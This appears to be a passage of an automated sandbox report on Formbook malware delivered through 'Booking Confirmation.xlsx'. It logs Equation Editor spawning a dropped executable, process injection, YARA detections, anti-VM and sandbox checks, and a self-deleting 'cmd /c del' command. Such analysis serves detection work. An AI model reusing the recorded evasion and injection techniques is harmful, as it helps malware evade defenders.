            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FC90 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FEA0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_009110D0 NtOpenProcessToken,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00910060 NtQuerySection,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_009101D4 NtSetValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0091010C NtOpenDirectoryObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00911148 NtOpenThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_009107AC NtCreateMutant,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090F8CC NtWaitForSingleObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00911930 NtSetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090F938 NtWriteFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FAB8 NtQueryValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FA20 NtQueryInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FA50 NtEnumerateValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FBE8 NtQueryVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FB50 NtCreateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FC30 NtOpenProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00910C40 NtGetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FC48 NtSetInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00911D80 NtSuspendThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FD5C NtEnumerateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FE24 NtWriteVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FFFC NtCreateProcessEx,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F700C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F707AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6F9F0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6F900 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FB50 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FAB8 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F701D4 NtSetValueKey,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F71148 NtOpenThread,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F7010C NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F710D0 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F70078 NtResumeThread,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F70060 NtQuerySection,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F70048 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F71930 NtSetContextThread,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6F938 NtWriteFile,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6F8CC NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FBE8 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FA50 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FA20 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F71D80 NtSuspendThread,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FD5C NtEnumerateKey,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FC90 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F70C40 NtGetContextThread,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FC48 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FC30 NtOpenProcess,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FFFC NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FEA0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F6FE24 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_00139D50 NtCreateFile,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_00139E00 NtReadFile,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_00139E80 NtClose,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_00139F30 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_00139D4B NtCreateFile,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_00139DA4 NtCreateFile,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_00139DFE NtReadFile,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_00139E7A NtClose,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_00139F2B NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01E693CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01E69862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01E693D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01E69DAE NtResumeThread,
            Source: C:\Windows\SysWOW64\cmd.exe, File deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: Booking Confirmation.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0091E2A8 appears 41 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0091DF5C appears 123 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0098F970 appears 84 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0096373B appears 245 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00963F92 appears 132 times
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01F7E2A8 appears 38 times
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01F7DF5C appears 120 times
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01FC3F92 appears 132 times
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01FC373B appears 245 times
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01FEF970 appears 84 times
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
            Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@9/6@5/3
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Booking Confirmation.xlsx
            Source: C:\Users\Public\vbc.exe | Mutant created: \Sessions\1\BaseNamedObjects\JhCZAcEj
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRBB3.tmp
            Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
            Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: Booking Confirmation.xlsx | Virustotal: Detection: 31%
            Source: Booking Confirmation.xlsx | ReversingLabs: Detection: 25%
            Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
            Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknown | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: unknown | Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: Booking Confirmation.xlsx | Static file information: File size 2169344 > 1048576
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: RAServer.pdb^ source: RegSvcs.exe, 00000005.00000002.2218050010.00000000003D0000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, raserver.exe
            Source: Binary string: RAServer.pdb source: RegSvcs.exe, 00000005.00000002.2218050010.00000000003D0000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb source: raserver.exe, 00000007.00000002.2378949879.000000000245F000.00000004.00000001.sdmp
            Source: Booking Confirmation.xlsx | Initial sample: OLE indicators vbamacros = False
            Source: Booking Confirmation.xlsx | Initial sample: OLE indicators encrypted = True
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00E86178 pushad ; ret
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00E85A4C push edx; iretd
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00E85219 push ss; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_004169BB push esi; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0040AB07 push ds; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00414E05 push ss; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041CEF2 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041CEFB push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041CEA5 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041CF5C push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0091DFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7DFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_001369BB push esi; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_0012AB07 push ds; retf
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_00134E05 push ss; retf
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_0013CEA5 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_0013CEF2 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_0013CEFB push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_0013CF5C push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01E6E3E6 pushad ; ret
            Source: initial sample | Static PE information: section name: .text entropy: 7.23266199922
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe

            Boot Survival:

            Drops PE files to the user root directory
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

            Hooking and other Techniques for Hiding and Protection:

            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: Booking Confirmation.xlsxStream path 'EncryptedPackage' entropy: 7.99989686385 (max. 8.0)

            Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match | File source: 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2189207331.0000000002371000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2884, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 00000000001298E4 second address: 00000000001298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 0000000000129B4E second address: 0000000000129B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00409A80 rdtsc
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2300 | Thread sleep time: -360000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2944 | Thread sleep time: -51520s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2424 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 1920 | Thread sleep time: -36000s >= -30000s
Source: C:\Windows\SysWOW64\raserver.exe TID: 3008 | Thread sleep time: -50000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: explorer.exe, 00000006.00000000.2191659808.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2205247966.000000000842E000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.2197981181.0000000004263000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
Source: explorer.exe, 00000006.00000000.2197956072.0000000004226000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD01dRom0
Source: explorer.exe, 00000006.00000000.2197956072.0000000004226000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD01
Source: explorer.exe, 00000006.00000000.2205247966.000000000842E000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.2197961773.0000000004234000.00000004.00000001.sdmp | Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 00000006.00000000.2197918909.00000000041DB000.00000004.00000001.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000006.00000002.2378407357.0000000000231000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
